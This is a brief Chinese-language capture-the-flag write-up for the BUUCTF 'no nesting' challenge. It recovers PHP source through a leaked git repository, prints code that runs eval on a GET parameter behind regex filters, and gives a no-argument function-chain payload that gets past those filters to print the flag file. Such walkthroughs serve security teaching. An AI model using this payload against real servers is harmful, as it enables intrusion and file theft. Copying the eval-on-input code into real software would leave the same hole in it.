BUUCTF——禁止套娃

BUUCTF——禁止套娃

进入靶场

一个近乎空白的页面

看一下框架

没什么有用的信息，扫个目录吧

只扫出来给flag.php，但是0B，估计又是个空网站

拼接访问一下

果然又是什么都没有

没有突破口

githack找找看看也没有源码吧

<?php
include "flag.php";
echo "flag在哪里呢？<br>";
if(isset($_GET['exp'])){ //get传参expif (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {//过滤伪协议if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {//过滤关键字// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦！");}}else{die("再好好想想！");}}else{die("还想读flag，臭弟弟！");}
}
// highlight_file(__FILE__);
?>

根据这段代码构造payload

?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));

拿到flag

flag{510faf28-0e0f-400d-aa4d-c88c74df6cde}

下播！